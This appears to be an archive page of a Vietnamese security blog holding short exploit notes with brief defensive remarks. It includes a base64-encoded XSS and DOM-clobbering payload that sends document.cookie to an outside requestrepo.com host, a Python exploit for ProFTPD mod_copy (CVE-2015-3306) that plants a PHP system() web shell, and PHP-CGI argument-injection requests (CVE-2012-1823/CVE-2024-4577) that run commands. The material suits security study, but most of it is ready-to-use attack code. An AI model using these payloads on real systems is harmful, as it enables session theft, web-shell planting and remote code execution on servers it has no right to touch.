
Đang hiển thị bài đăng từ Tháng 1, 2025
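 Book — DOMPurify 3.2.2 có lỗ hổng nhưng không exploit được. Payload: http://172.31.3.2:8000/book?title=PGgxIGlkPSJjb25maWciPjxoMSBpZD0iY29uZmlnIiBuYW1lPSJERUJVRyI%2BPC9oMT48L2gxPg%3D%3D&content=PGltZyBzcmM9eDogb25lcnJvcj0iKG5ldyBJbWFnZSkuc3JjPScvL3Bnb2hpaGd2LnJlcXVlc3RyZXBvLmNvbT8nK2RvY3VtZW50LmNvb2tpZSI%2BDQoNCg%3D%3D
 Ghi chú: hai tham số là base64 đã URL-encode. `title` giải mã thành hai thẻ <h1 id="config"> lồng nhau, thẻ trong có name="DEBUG" (thử DOM clobbering); `content` là thẻ <img> có onerror gửi document.cookie ra máy chủ ngoài. Phía phòng thủ: DOMPurify mặc định vẫn giữ thuộc tính id/name, nên cần bật SANITIZE_NAMED_PROPS nếu mã phía client đọc biến toàn cục như `config`, và đặt cookie phiên là HttpOnly.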
└─$ source venv/bin/activate

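CVE-2015-3306 (ProFTPD mod_copy: SITE CPFR/CPTO được chấp nhận khi chưa đăng nhập — khắc phục: tắt mod_copy hoặc nâng cấp ProFTPD)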

#!/usr/bin/env python3 import sys import socket import requests def exploit ( client , target ):     client .connect(( target , 21 )) # Connecting to the target server     banner = client .recv( 74 )     print ( banner .decode())     client .send( b 'site cpfr /proc/self/cmdline \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /tmp/<?php system("id"); ?> \r\n ' ) # phpinfo() is just a PoC.     print ( client .recv( 1024 ).decode())     client .send( b 'site cpfr /tmp/<?php system("id"); ?> \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /var/www/html/konchan.php \r\n ' )     print ( client .recv( 1024 ).decode())     client .close()     print ( 'Exploit Completed' ) def check ( url ):     req = requests . get ( url ) # Requesting the written PoC php file via HT...

CVE-2012-1823/CVE-2024-4577

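CVE-2012-1823 && CVE-2024-4577 (PHP CGI ARGUMENT INJECTION)
$HOST /?-f C:\Windows\System32\Drivers\etc\hosts
$HOST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
<?php system("ls -la"); ?>
Note: both issues come from php-cgi treating a query string with no unescaped "=" as command-line switches; CVE-2024-4577 is the Windows-specific bypass of the 2012 fix. For detection, alert on requests whose query string begins with a "-" switch or carries `allow_url_include` / `auto_prepend_file`. For mitigation, upgrade PHP and avoid exposing php-cgi directly.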